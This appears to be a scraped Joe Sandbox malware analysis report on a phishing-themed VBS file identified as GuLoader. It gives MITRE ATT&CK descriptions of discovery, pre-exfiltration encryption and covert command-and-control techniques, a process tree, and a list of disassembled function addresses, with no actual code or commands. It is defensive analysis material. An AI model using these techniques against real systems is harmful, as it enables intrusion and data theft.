Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exe PID: 360 Parent PID: 3472

General

Chronological Activities

Analysis Process: ipconfig.exe PID: 4308 Parent PID: 360

General

Chronological Activities

Analysis Process: conhost.exe PID: 5776 Parent PID: 4308

General

Chronological Activities

Analysis Process: AZTEKERNES.exe PID: 3336 Parent PID: 360

General

Chronological Activities

Analysis Process: ipconfig.exe PID: 4892 Parent PID: 360

Function 0041015B, Relevance: 109.1, APIs: 60, Strings: 2, Instructions: 606
COMMON

Function 00411684, Relevance: 61.6, APIs: 29, Strings: 6, Instructions: 363
COMMON

Function 0040954B, Relevance: .2, Instructions: 196
COMMONCrypto

Function 0040784E, Relevance: .1, Instructions: 86
COMMON

Function 00411095, Relevance: 37.7, APIs: 25, Instructions: 246
COMMON

Function 00410008, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 78
COMMON

Function 0040FE4C, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 110
COMMON

Function 0041147A, Relevance: 24.1, APIs: 16, Instructions: 139
COMMON

Function 00410E07, Relevance: 21.2, APIs: 14, Instructions: 155
COMMON

Function 0040FAF4, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Function 0040FD19, Relevance: 10.6, APIs: 7, Instructions: 79
COMMON